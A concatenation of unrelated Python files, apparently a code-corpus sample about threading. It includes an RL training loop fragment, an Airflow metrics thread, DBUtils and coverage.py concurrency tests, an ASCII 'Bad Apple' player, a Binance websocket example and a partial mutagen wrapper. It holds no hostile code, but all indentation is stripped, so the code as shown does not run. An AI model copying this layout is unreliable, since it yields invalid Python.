dequeue_thread = threading.Thread(target=learner_dequeue_thread, args=(agent,params, mon_sess, dequeue, queuesize_op, Dequeue_Length),daemon=True)
first_time=True
while not mon_sess.should_stop():
if first_time == True:
dequeue_thread.start()
first_time=False
up_del_tmp=params.dict['update_delay']/1000.0
time.sleep(up_del_tmp)
if agent.rp_buffer.ptr>200 or agent.rp_buffer.full :
agent.train_step()
if params.dict['use_hard_target'] == False:
agent.target_update()
if counter %params.dict['hard_target'] == 0 :
current_opt_step = agent.sess.run(agent.global_step)
logger.info("Optimize step:{}".format(current_opt_step))
logger.info("rp_buffer ptr:{}".format(agent.rp_buffer.ptr))
else:
if counter %params.dict['hard_target'] == 0 :
agent.target_update()
current_opt_step = agent.sess.run(agent.global_step)
logger.info("Optimize step:{}".format(current_opt_step))
logger.info("rp_buffer ptr:{}".format(agent.rp_buffer.ptr))
counter += 1
else:
start = time.time()
step_counter = np.int64(0)
eval_step_counter = np.int64(0)
s0 = env.reset()
s0_rec_buffer = np.zeros([s_dim])
s1_rec_buffer = np.zeros([s_dim])
s0_rec_buffer[-1*params.dict['state_dim']:] = s0
if params.dict['recurrent']:
a = agent.get_action(s0_rec_buffer,not config.eval)
else:
a = agent.get_action(s0, not config.eval)
a = a[0][0]
env.write_action(a)
epoch = 0
ep_r = 0.0
start = time.time()
while True:
start = time.time()
epoch += 1
step_counter += 1
s1, r, terminal, error_code = env.step(a,eval_=config.eval)
if error_code == True:
s1_rec_buffer = np.concatenate( (s0_rec_buffer[params.dict['state_dim']:], s1) )
if params.dict['recurrent']:
a1 = agent.get_action(s1_rec_buffer, not config.eval)
else:
a1 = agent.get_action(s1,not config.eval)
a1 = a1[0][0]
env.write_action(a1)
else:
print("TaskID:"+str(config.task)+"Invalid state received...\n")
env.write_action(a)
continue
if params.dict['recurrent']:
fd = {a_s0:s0_rec_buffer, a_action:a, a_reward:np.array([r]), a_s1:s1_rec_buffer, a_terminal:np.array([terminal], np.float)}
else:
fd = {a_s0:s0, a_action:a, a_reward:np.array([r]), a_s1:s1, a_terminal:np.array([terminal], np.float)}
if not config.eval:
mon_sess.run(actor_op, feed_dict=fd)
s0 = s1
a = a1
if params.dict['recurrent']:
s0_rec_buffer = s1_rec_buffer
if not params.dict['use_TCP'] and (terminal):
if agent.actor_noise != None:
agent.actor_noise.reset()
if (epoch% params.dict['eval_frequency'] == 0):
eval_step_counter = evaluate_TCP(env, agent, epoch, summary_writer, params, s0_rec_buffer, eval_step_counter)
print("total time:", time.time()-start)
def learner_dequeue_thread(agent,params, mon_sess, dequeue, queuesize_op, Dequeue_Length):
ct = 0
while True:
ct = ct + 1
data = mon_sess.run(dequeue)
agent.store_many_experience(data[0], data[1], data[2], data[3], data[4], Dequeue_Length)
time.sleep(0.01)
def learner_update_thread(agent,params):
delay=params.dict['update_delay']/1000.0
ct = 0
while True:
agent.train_step()
agent.target_update()
time.sleep(delay)
if __name__ == "__main__":
main()
|
patch_thread.py | import sys
from datetime import datetime, timedelta
from threading import Thread
from time import sleep
import sqlalchemy
from airflow.models import TaskInstance
from airflow.settings import Stats
from airflow.utils.db import provide_session
from pytz import utc
from airflow_metrics.utils.fn_utils import once
from airflow_metrics.utils.fn_utils import capture_exception
@provide_session
def task_states(_since, session=None):
states = (
session.query(TaskInstance.state, sqlalchemy.func.count())
.group_by(TaskInstance.state)
)
for state, count in states:
if state is None:
continue
tags = {
'state': state
}
Stats.gauge('task.state', count, tags=tags)
@provide_session
def bq_task_states(since, session=None):
states = (
session.query(TaskInstance.state, sqlalchemy.func.count())
.filter(TaskInstance.operator == 'BigQueryOperator')
.filter(TaskInstance.end_date > since)
.group_by(TaskInstance.state)
)
for state, count in states:
if state is None:
continue
tags = {
'state': state
}
Stats.incr('task.state.bq', count, tags=tags)
def forever(funcs, sleep_time):
passed = timedelta(seconds=sleep_time)
def wrapped():
while True:
for func in funcs:
since = datetime.utcnow() - passed
func(utc.localize(since))
sleep(sleep_time)
return wrapped
@once
def patch_thread():
try:
if len(sys.argv) > 1 and sys.argv[1] == 'scheduler':
funcs = [
task_states,
bq_task_states,
]
thread = Thread(target=forever(funcs, 10))
thread.daemon = True
thread.start()
except Exception as ex: # pylint: disable=broad-except
capture_exception(ex)
|
TestPersistentDB.py | """Test the PersistentDB module.
Note:
We don't test performance here, so the test does not predicate
whether PersistentDB actually will help in improving performance or not.
We also assume that the underlying SteadyDB connections are tested.
Copyright and credit info:
* This test was contributed by Christoph Zwerschke
"""
__version__ = '1.0'
__revision__ = "$Rev: 7680 $"
__date__ = "$Date$"
import sys
import unittest
sys.path.insert(1, '../..')
# The TestSteadyDB module serves as a mock object for the DB-API 2 module:
from DBUtils import ThreadingLocal
from DBUtils.Testing import TestSteadyDB as dbapi
from DBUtils.PersistentDB import PersistentDB
class TestPersistentDB(unittest.TestCase):
def setUp(self):
dbapi.threadsafety = 1
def test0_CheckVersion(self):
from DBUtils import __version__ as DBUtilsVersion
self.assertEqual(DBUtilsVersion, __version__)
from DBUtils.PersistentDB import __version__ as PersistentDBVersion
self.assertEqual(PersistentDBVersion, __version__)
self.assertEqual(PersistentDB.version, __version__)
def test1_NoThreadsafety(self):
from DBUtils.PersistentDB import NotSupportedError
for dbapi.threadsafety in (None, 0):
self.assertRaises(NotSupportedError, PersistentDB, dbapi)
def test2_PersistentDBClose(self):
for closeable in (False, True):
persist = PersistentDB(dbapi, closeable=closeable)
db = persist.connection()
self.assert_(db._con.valid)
db.close()
self.assert_(closeable ^ db._con.valid)
db.close()
self.assert_(closeable ^ db._con.valid)
db._close()
self.assert_(not db._con.valid)
db._close()
self.assert_(not db._con.valid)
def test3_PersistentDBConnection(self):
persist = PersistentDB(dbapi)
db = persist.connection()
db_con = db._con
self.assert_(db_con.database is None)
self.assert_(db_con.user is None)
db2 = persist.connection()
self.assertEqual(db, db2)
db3 = persist.dedicated_connection()
self.assertEqual(db, db3)
db3.close()
db2.close()
db.close()
def test4_PersistentDBThreads(self):
numThreads = 3
persist = PersistentDB(dbapi, closeable=True)
from Queue import Queue, Empty
queryQueue, resultQueue = [], []
for i in range(numThreads):
queryQueue.append(Queue(1))
resultQueue.append(Queue(1))
def runQueries(i):
this_db = persist.connection()
while 1:
try:
try:
q = queryQueue[i].get(1, 1)
except TypeError:
q = queryQueue[i].get(1)
except Empty:
q = None
if not q:
break
db = persist.connection()
if db != this_db:
r = 'error - not persistent'
else:
if q == 'ping':
r = 'ok - thread alive'
elif q == 'close':
db.close()
r = 'ok - connection closed'
else:
cursor = db.cursor()
cursor.execute(q)
r = cursor.fetchone()
cursor.close()
r = '%d(%d): %s' % (i, db._usage, r)
try:
resultQueue[i].put(r, 1, 1)
except TypeError:
resultQueue[i].put(r, 1)
db.close()
from threading import Thread
threads = []
for i in range(numThreads):
thread = Thread(target=runQueries, args=(i,))
threads.append(thread)
thread.start()
for i in range(numThreads):
try:
queryQueue[i].put('ping', 1, 1)
except TypeError:
queryQueue[i].put('ping', 1)
for i in range(numThreads):
try:
r = resultQueue[i].get(1, 1)
except TypeError:
r = resultQueue[i].get(1)
self.assertEqual(r, '%d(0): ok - thread alive' % i)
self.assert_(threads[i].isAlive())
for i in range(numThreads):
for j in range(i + 1):
try:
queryQueue[i].put('select test%d' % j, 1, 1)
r = resultQueue[i].get(1, 1)
except TypeError:
queryQueue[i].put('select test%d' % j, 1)
r = resultQueue[i].get(1)
self.assertEqual(r, '%d(%d): test%d' % (i, j + 1, j))
try:
queryQueue[1].put('select test4', 1, 1)
except TypeError:
queryQueue[1].put('select test4', 1)
try:
r = resultQueue[1].get(1, 1)
except TypeError:
r = resultQueue[1].get(1)
self.assertEqual(r, '1(3): test4')
try:
queryQueue[1].put('close', 1, 1)
r = resultQueue[1].get(1, 1)
except TypeError:
queryQueue[1].put('close', 1)
r = resultQueue[1].get(1)
self.assertEqual(r, '1(3): ok - connection closed')
for j in range(2):
try:
queryQueue[1].put('select test%d' % j, 1, 1)
r = resultQueue[1].get(1, 1)
except TypeError:
queryQueue[1].put('select test%d' % j, 1)
r = resultQueue[1].get(1)
self.assertEqual(r, '1(%d): test%d' % (j + 1, j))
for i in range(numThreads):
self.assert_(threads[i].isAlive())
try:
queryQueue[i].put('ping', 1, 1)
except TypeError:
queryQueue[i].put('ping', 1)
for i in range(numThreads):
try:
r = resultQueue[i].get(1, 1)
except TypeError:
r = resultQueue[i].get(1)
self.assertEqual(r, '%d(%d): ok - thread alive' % (i, i + 1))
self.assert_(threads[i].isAlive())
for i in range(numThreads):
try:
queryQueue[i].put(None, 1, 1)
except TypeError:
queryQueue[i].put(None, 1)
def test5_PersistentDBMaxUsage(self):
persist = PersistentDB(dbapi, 20)
db = persist.connection()
self.assertEqual(db._maxusage, 20)
for i in range(100):
cursor = db.cursor()
cursor.execute('select test%d' % i)
r = cursor.fetchone()
cursor.close()
self.assertEqual(r, 'test%d' % i)
self.assert_(db._con.valid)
j = i % 20 + 1
self.assertEqual(db._usage, j)
self.assertEqual(db._con.num_uses, j)
self.assertEqual(db._con.num_queries, j)
def test6_PersistentDBSetSession(self):
persist = PersistentDB(dbapi, 3, ('set datestyle',))
db = persist.connection()
self.assertEqual(db._maxusage, 3)
self.assertEqual(db._setsession_sql, ('set datestyle',))
self.assertEqual(db._con.session, ['datestyle'])
cursor = db.cursor()
cursor.execute('set test')
cursor.fetchone()
cursor.close()
for i in range(3):
self.assertEqual(db._con.session, ['datestyle', 'test'])
cursor = db.cursor()
cursor.execute('select test')
cursor.fetchone()
cursor.close()
self.assertEqual(db._con.session, ['datestyle'])
def test7_PersistentDBThreadLocal(self):
persist = PersistentDB(dbapi)
self.assert_(isinstance(persist.thread, ThreadingLocal.local))
class threadlocal:
pass
persist = PersistentDB(dbapi, threadlocal=threadlocal)
self.assert_(isinstance(persist.thread, threadlocal))
if __name__ == '__main__':
unittest.main()
|
badapple.py | # file: badapple.py
# description: generate and display txt in cmd.exe
# translated from Touhou - Bad Apple mp4 clip
# author: Hiukong Dan
# version: 1.0 5/May/2021
"""
TODO:
improve resolution of the translated ascii code image
manipulate cmd buffer directly and using another method instead of print
hide cursor if possible (the last line always showing blank due to appearance of cursor)
generating txt: using a compress algorithm to store converted strings
"""
import cv2
import numpy as np
import playsound
import math
import os
import time
import threading
from compressTxt import decompress
def getNextFrameTxt(frame):
"""
used by function preprocess
translate each frame from original frame
to a much low resolution frame (specifically current cmd column/row numbers)
using character '#' for white pixel,
using character ' ' for black pixel,
"""
tmp = frame.reshape(1, frame.shape[0] * frame.shape[1] * len(frame[0][0]))
tmp = [round(tmp[0][x]/255) for x in range(0, len(tmp[0]), 3)]
# transform badapple pixels to single values, 0 for black, 1 for white
raw_pixels = np.array(tmp).reshape(frame.shape[0], frame.shape[1])
# print(raw_pixels)
cv2.imshow('frame', frame)
win_size = os.get_terminal_size()
ret = []
for row_count in range(0, len(raw_pixels), int(raw_pixels.shape[0]/win_size[1])):
row = raw_pixels[row_count]
ret.append(["#" if row[x] == 0 else " " for x in range(0, raw_pixels.shape[1], int(raw_pixels.shape[1]/win_size[0]))])
# print("converted shape: %d, %d" % (len(ret), len(ret[0])))
res = ""
for row in ret:
res += ''.join(row)
res += "\n"
return res
def preprocess():
"""
used to generated bad apple txt from original mp4 data
"""
with open("badapple.txt", 'w') as fil:
cap = cv2.VideoCapture("Touhou - Bad Apple.mp4")
while(cap.isOpened()):
ret, frame = cap.read()
if(ret == True):
fil.write(getNextFrameTxt(frame))
cap.release()
cv2.destroyAllWindows()
def processBadAppleTxt():
"""
process string data generated by function preprocess
and display frame by frame using a lag calculated method
"""
win_size = os.get_terminal_size()
frame_rate = 30
current_frame = 0
start_time = time.time()
with open("compressed_badapple.txt", 'r') as fil:
while True:
try:
display = ""
for x in range(win_size[1]-1):
display += decompress(fil.readline())
fil.readline()
print(display)
next_frame_time = (current_frame + 1) * 1 / frame_rate + start_time
current_frame += 1
lag = next_frame_time - time.time()
if lag > 0:
time.sleep(lag)
except AssertionError as error:
print(error)
break
def playBadAppleSound():
"""
play audio using playsound
"""
playsound.playsound("Touhou - Bad Apple.mp3")
if __name__ == "__main__":
display_task = threading.Thread(target=processBadAppleTxt)
playsound_task = threading.Thread(target=playBadAppleSound)
display_task.start()
playsound_task.start()
"""
# opencv test code
cap = cv2.VideoCapture("Touhou - Bad Apple.mp4")
while(cap.isOpened()):
ret, frame = cap.read()
if(ret == True):
printNextFrame(frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
cv2.destroyAllWindows()
"""
|
test_concurrency.py | # Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://github.com/nedbat/coveragepy/blob/master/NOTICE.txt
"""Tests for concurrency libraries."""
import glob
import os
import random
import re
import sys
import threading
import time
from flaky import flaky
import pytest
import coverage
from coverage import env
from coverage.data import line_counts
from coverage.files import abs_file
from coverage.misc import import_local_file
from tests.coveragetest import CoverageTest
from tests.helpers import remove_files
# These libraries aren't always available, we'll skip tests if they aren't.
try:
import multiprocessing
except ImportError: # pragma: only jython
multiprocessing = None
try:
import eventlet
except ImportError:
eventlet = None
try:
import gevent
except ImportError:
gevent = None
try:
import greenlet
except ImportError: # pragma: only jython
greenlet = None
def measurable_line(l):
"""Is this a line of code coverage will measure?
Not blank, not a comment, and not "else"
"""
l = l.strip()
if not l:
return False
if l.startswith('#'):
return False
if l.startswith('else:'):
return False
if env.JYTHON and l.startswith(('try:', 'except:', 'except ', 'break', 'with ')):
# Jython doesn't measure these statements.
return False # pragma: only jython
return True
def line_count(s):
"""How many measurable lines are in `s`?"""
return len(list(filter(measurable_line, s.splitlines())))
def print_simple_annotation(code, linenos):
"""Print the lines in `code` with X for each line number in `linenos`."""
for lineno, line in enumerate(code.splitlines(), start=1):
print(" {} {}".format("X" if lineno in linenos else " ", line))
class LineCountTest(CoverageTest):
"""Test the helpers here."""
run_in_temp_dir = False
def test_line_count(self):
CODE = """
# Hey there!
x = 1
if x:
print("hello")
else:
print("bye")
print("done")
"""
assert line_count(CODE) == 5
# The code common to all the concurrency models.
SUM_RANGE_Q = """
# Above this will be imports defining queue and threading.
class Producer(threading.Thread):
def __init__(self, limit, q):
threading.Thread.__init__(self)
self.limit = limit
self.q = q
def run(self):
for i in range(self.limit):
self.q.put(i)
self.q.put(None)
class Consumer(threading.Thread):
def __init__(self, q, qresult):
threading.Thread.__init__(self)
self.q = q
self.qresult = qresult
def run(self):
sum = 0
while "no peephole".upper():
i = self.q.get()
if i is None:
break
sum += i
self.qresult.put(sum)
def sum_range(limit):
q = queue.Queue()
qresult = queue.Queue()
c = Consumer(q, qresult)
p = Producer(limit, q)
c.start()
p.start()
p.join()
c.join()
return qresult.get()
# Below this will be something using sum_range.
"""
PRINT_SUM_RANGE = """
print(sum_range({QLIMIT}))
"""
# Import the things to use threads.
THREAD = """
import threading
import queue
"""
# Import the things to use eventlet.
EVENTLET = """
import eventlet.green.threading as threading
import eventlet.queue as queue
"""
# Import the things to use gevent.
GEVENT = """
from gevent import monkey
monkey.patch_thread()
import threading
import gevent.queue as queue
"""
# Uncomplicated code that doesn't use any of the concurrency stuff, to test
# the simple case under each of the regimes.
SIMPLE = """
total = 0
for i in range({QLIMIT}):
total += i
print(total)
"""
def cant_trace_msg(concurrency, the_module):
"""What might coverage.py say about a concurrency setting and imported module?"""
# In the concurrency choices, "multiprocessing" doesn't count, so remove it.
if "multiprocessing" in concurrency:
parts = concurrency.split(",")
parts.remove("multiprocessing")
concurrency = ",".join(parts)
if the_module is None:
# We don't even have the underlying module installed, we expect
# coverage to alert us to this fact.
expected_out = (
"Couldn't trace with concurrency=%s, "
"the module isn't installed.\n" % concurrency
)
elif env.C_TRACER or concurrency == "thread" or concurrency == "":
expected_out = None
else:
expected_out = (
"Can't support concurrency=%s with PyTracer, "
"only threads are supported\n" % concurrency
)
return expected_out
class ConcurrencyTest(CoverageTest):
"""Tests of the concurrency support in coverage.py."""
QLIMIT = 1000
def try_some_code(self, code, concurrency, the_module, expected_out=None):
"""Run some concurrency testing code and see that it was all covered.
`code` is the Python code to execute. `concurrency` is the name of
the concurrency regime to test it under. `the_module` is the imported
module that must be available for this to work at all. `expected_out`
is the text we expect the code to produce.
"""
self.make_file("try_it.py", code)
cmd = "coverage run --concurrency=%s try_it.py" % concurrency
out = self.run_command(cmd)
expected_cant_trace = cant_trace_msg(concurrency, the_module)
if expected_cant_trace is not None:
assert out == expected_cant_trace
else:
# We can fully measure the code if we are using the C tracer, which
# can support all the concurrency, or if we are using threads.
if expected_out is None:
expected_out = "%d\n" % (sum(range(self.QLIMIT)))
print(code)
assert out == expected_out
# Read the coverage file and see that try_it.py has all its lines
# executed.
data = coverage.CoverageData(".coverage")
data.read()
# If the test fails, it's helpful to see this info:
fname = abs_file("try_it.py")
linenos = data.lines(fname)
print(f"{len(linenos)}: {linenos}")
print_simple_annotation(code, linenos)
lines = line_count(code)
assert line_counts(data)['try_it.py'] == lines
def test_threads(self):
code = (THREAD + SUM_RANGE_Q + PRINT_SUM_RANGE).format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "thread", threading)
def test_threads_simple_code(self):
code = SIMPLE.format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "thread", threading)
def test_eventlet(self):
code = (EVENTLET + SUM_RANGE_Q + PRINT_SUM_RANGE).format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "eventlet", eventlet)
def test_eventlet_simple_code(self):
code = SIMPLE.format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "eventlet", eventlet)
def test_gevent(self):
code = (GEVENT + SUM_RANGE_Q + PRINT_SUM_RANGE).format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "gevent", gevent)
def test_gevent_simple_code(self):
code = SIMPLE.format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "gevent", gevent)
def test_greenlet(self):
GREENLET = """\
from greenlet import greenlet
def test1(x, y):
z = gr2.switch(x+y)
print(z)
def test2(u):
print(u)
gr1.switch(42)
gr1 = greenlet(test1)
gr2 = greenlet(test2)
gr1.switch("hello", " world")
"""
self.try_some_code(GREENLET, "greenlet", greenlet, "hello world\n42\n")
def test_greenlet_simple_code(self):
code = SIMPLE.format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "greenlet", greenlet)
def test_bug_330(self):
BUG_330 = """\
from weakref import WeakKeyDictionary
import eventlet
def do():
eventlet.sleep(.01)
gts = WeakKeyDictionary()
for _ in range(100):
gts[eventlet.spawn(do)] = True
eventlet.sleep(.005)
eventlet.sleep(.1)
print(len(gts))
"""
self.try_some_code(BUG_330, "eventlet", eventlet, "0\n")
SQUARE_OR_CUBE_WORK = """
def work(x):
# Use different lines in different subprocesses.
if x % 2:
y = x*x
else:
y = x*x*x
return y
"""
SUM_RANGE_WORK = """
def work(x):
return sum_range((x+1)*100)
"""
MULTI_CODE = """
# Above this will be a definition of work().
import multiprocessing
import os
import time
import sys
def process_worker_main(args):
# Need to pause, or the tasks go too quickly, and some processes
# in the pool don't get any work, and then don't record data.
time.sleep(0.02)
ret = work(*args)
return os.getpid(), ret
if __name__ == "__main__": # pragma: no branch
# This if is on a single line so we can get 100% coverage
# even if we have no arguments.
if len(sys.argv) > 1: multiprocessing.set_start_method(sys.argv[1])
pool = multiprocessing.Pool({NPROCS})
inputs = [(x,) for x in range({UPTO})]
outputs = pool.imap_unordered(process_worker_main, inputs)
pids = set()
total = 0
for pid, sq in outputs:
pids.add(pid)
total += sq
print("%d pids, total = %d" % (len(pids), total))
pool.close()
pool.join()
"""
@pytest.mark.skipif(not multiprocessing, reason="No multiprocessing in this Python")
@flaky(max_runs=30) # Sometimes a test fails due to inherent randomness. Try more times.
class MultiprocessingTest(CoverageTest):
"""Test support of the multiprocessing module."""
def try_multiprocessing_code(
self, code, expected_out, the_module, nprocs, concurrency="multiprocessing", args=""
):
"""Run code using multiprocessing, it should produce `expected_out`."""
self.make_file("multi.py", code)
self.make_file(".coveragerc", """\
[run]
concurrency = %s
source = .
""" % concurrency)
for start_method in ["fork", "spawn"]:
if start_method and start_method not in multiprocessing.get_all_start_methods():
continue
remove_files(".coverage", ".coverage.*")
cmd = "coverage run {args} multi.py {start_method}".format(
args=args, start_method=start_method,
)
out = self.run_command(cmd)
expected_cant_trace = cant_trace_msg(concurrency, the_module)
if expected_cant_trace is not None:
assert out == expected_cant_trace
else:
assert out.rstrip() == expected_out
assert len(glob.glob(".coverage.*")) == nprocs + 1
out = self.run_command("coverage combine")
assert out == ""
out = self.run_command("coverage report -m")
last_line = self.squeezed_lines(out)[-1]
assert re.search(r"TOTAL \d+ 0 100%", last_line)
def test_multiprocessing_simple(self):
nprocs = 3
upto = 30
code = (SQUARE_OR_CUBE_WORK + MULTI_CODE).format(NPROCS=nprocs, UPTO=upto)
total = sum(x*x if x%2 else x*x*x for x in range(upto))
expected_out = f"{nprocs} pids, total = {total}"
self.try_multiprocessing_code(code, expected_out, threading, nprocs)
def test_multiprocessing_append(self):
nprocs = 3
upto = 30
code = (SQUARE_OR_CUBE_WORK + MULTI_CODE).format(NPROCS=nprocs, UPTO=upto)
total = sum(x*x if x%2 else x*x*x for x in range(upto))
expected_out = f"{nprocs} pids, total = {total}"
self.try_multiprocessing_code(code, expected_out, threading, nprocs, args="--append")
def test_multiprocessing_and_gevent(self):
nprocs = 3
upto = 30
code = (
SUM_RANGE_WORK + EVENTLET + SUM_RANGE_Q + MULTI_CODE
).format(NPROCS=nprocs, UPTO=upto)
total = sum(sum(range((x + 1) * 100)) for x in range(upto))
expected_out = f"{nprocs} pids, total = {total}"
self.try_multiprocessing_code(
code, expected_out, eventlet, nprocs, concurrency="multiprocessing,eventlet"
)
def try_multiprocessing_code_with_branching(self, code, expected_out):
"""Run code using multiprocessing, it should produce `expected_out`."""
self.make_file("multi.py", code)
self.make_file("multi.rc", """\
[run]
concurrency = multiprocessing
branch = True
omit = */site-packages/*
""")
for start_method in ["fork", "spawn"]:
if start_method and start_method not in multiprocessing.get_all_start_methods():
continue
out = self.run_command(f"coverage run --rcfile=multi.rc multi.py {start_method}")
assert out.rstrip() == expected_out
out = self.run_command("coverage combine")
assert out == ""
out = self.run_command("coverage report -m")
last_line = self.squeezed_lines(out)[-1]
assert re.search(r"TOTAL \d+ 0 \d+ 0 100%", last_line)
def test_multiprocessing_with_branching(self):
nprocs = 3
upto = 30
code = (SQUARE_OR_CUBE_WORK + MULTI_CODE).format(NPROCS=nprocs, UPTO=upto)
total = sum(x*x if x%2 else x*x*x for x in range(upto))
expected_out = f"{nprocs} pids, total = {total}"
self.try_multiprocessing_code_with_branching(code, expected_out)
def test_multiprocessing_bootstrap_error_handling(self):
# An exception during bootstrapping will be reported.
self.make_file("multi.py", """\
import multiprocessing
if __name__ == "__main__":
with multiprocessing.Manager():
pass
""")
self.make_file(".coveragerc", """\
[run]
concurrency = multiprocessing
_crash = _bootstrap
""")
out = self.run_command("coverage run multi.py")
assert "Exception during multiprocessing bootstrap init" in out
assert "Exception: Crashing because called by _bootstrap" in out
def test_bug890(self):
# chdir in multiprocessing shouldn't keep us from finding the
# .coveragerc file.
self.make_file("multi.py", """\
import multiprocessing, os, os.path
if __name__ == "__main__":
if not os.path.exists("./tmp"): os.mkdir("./tmp")
os.chdir("./tmp")
with multiprocessing.Manager():
pass
print("ok")
""")
self.make_file(".coveragerc", """\
[run]
concurrency = multiprocessing
""")
out = self.run_command("coverage run multi.py")
assert out.splitlines()[-1] == "ok"
def test_coverage_stop_in_threads():
has_started_coverage = []
has_stopped_coverage = []
def run_thread(): # pragma: nested
"""Check that coverage is stopping properly in threads."""
deadline = time.time() + 5
ident = threading.current_thread().ident
if sys.gettrace() is not None:
has_started_coverage.append(ident)
while sys.gettrace() is not None:
# Wait for coverage to stop
time.sleep(0.01)
if time.time() > deadline:
return
has_stopped_coverage.append(ident)
cov = coverage.Coverage()
cov.start()
t = threading.Thread(target=run_thread) # pragma: nested
t.start() # pragma: nested
time.sleep(0.1) # pragma: nested
cov.stop() # pragma: nested
t.join()
assert has_started_coverage == [t.ident]
assert has_stopped_coverage == [t.ident]
def test_thread_safe_save_data(tmpdir):
# Non-regression test for: https://github.com/nedbat/coveragepy/issues/581
# Create some Python modules and put them in the path
modules_dir = tmpdir.mkdir('test_modules')
module_names = [f"m{i:03d}" for i in range(1000)]
for module_name in module_names:
modules_dir.join(module_name + ".py").write("def f(): pass\n")
# Shared variables for threads
should_run = [True]
imported = []
old_dir = os.getcwd()
os.chdir(modules_dir.strpath)
try:
# Make sure that all dummy modules can be imported.
for module_name in module_names:
import_local_file(module_name)
def random_load(): # pragma: nested
"""Import modules randomly to stress coverage."""
while should_run[0]:
module_name = random.choice(module_names)
mod = import_local_file(module_name)
mod.f()
imported.append(mod)
# Spawn some threads with coverage enabled and attempt to read the
# results right after stopping coverage collection with the threads
# still running.
duration = 0.01
for _ in range(3):
cov = coverage.Coverage()
cov.start()
threads = [threading.Thread(target=random_load) for _ in range(10)] # pragma: nested
should_run[0] = True # pragma: nested
for t in threads: # pragma: nested
t.start()
time.sleep(duration) # pragma: nested
cov.stop() # pragma: nested
# The following call used to crash with running background threads.
cov.get_data()
# Stop the threads
should_run[0] = False
for t in threads:
t.join()
if (not imported) and duration < 10: # pragma: only failure
duration *= 2
finally:
os.chdir(old_dir)
should_run[0] = False
|
example_kline_1m.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_kline_1m.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from __future__ import print_function
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
# https://docs.python.org/3/library/logging.html
logging.basicConfig(filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
logging.getLogger('unicorn-log').setLevel(logging.INFO)
logging.getLogger('unicorn-log').addHandler(logging.StreamHandler())
# create instance of BinanceWebSocketApiManager
binance_websocket_api_manager = BinanceWebSocketApiManager()
binance_get_kline_1m_bnbbtc = binance_websocket_api_manager.create_stream('kline_1m', 'bnbbtc')
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
else:
from unicorn_fy import UnicornFy
oldest_stream_data_from_stream_buffer = UnicornFy.binance_websocket(oldest_stream_data_from_stream_buffer)
if oldest_stream_data_from_stream_buffer['event_time'] >= oldest_stream_data_from_stream_buffer['kline']['kline_close_time']:
print(oldest_stream_data_from_stream_buffer)
# start one worker process (or more) to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
|
wrapper.py | import logging
import os
import re
import shlex
import subprocess
import sys
import time
from queue import Queue, Empty
from threading import Thread
from click import ClickException
mutagen = os.environ.get('MUTAGEN_HELPER_MUTAGEN_BIN', "mutagen.exe" if os.name == 'nt' else "mutagen")
class WrapperException(ClickException):
pass
class WrapperRunException(WrapperException):
def __init__(self, *args, **kwargs):
self.result = kwargs.pop('result')
super().__init__(*args, **kwargs)
def format_message(self):
message = super().format_message()
if self.result:
if self.result.stdout:
message = message + os.linesep + self.result.stdout
if self.result.stderr:
message = message + os.linesep + self.result.stderr
return message
class MutagenRunException(WrapperRunException):
pass
class DaemonNotRunningException(WrapperRunException):
pass
class MultipleSessionsException(WrapperRunException):
pass
class MutagenListParser:
def _is_separator_line(self, line):
return line.startswith('-' * 10)
def _is_no_session_line(self, line):
return line in ['No sessions found', 'No synchronization sessions found']
def parse(self, output, result=None):
if not output:
return []
lines = output.splitlines()
first_separator_reached = False
stack = [{}]
sessions = []
current_object = {}
previous_key = None
for line in lines:
if not first_separator_reached:
if self._is_separator_line(line):
first_separator_reached = True
continue
if self._is_separator_line(line):
sessions.append(stack[0])
previous_key = None
current_session = {}
stack = [current_session]
elif self._is_no_session_line(line):
sessions = []
break
else:
if ':' in line:
key, value = line.split(":", 1)
stack_size = key.count('\t') + 1
key = key.strip()
value = value.strip()
if stack_size == len(stack) + 1:
current_object = {}
if stack[-1][previous_key]:
raise WrapperRunException("Invalid structure for mutagen output", result=result)
stack[-1][previous_key] = current_object
stack.append(current_object)
else:
stack = stack[:stack_size]
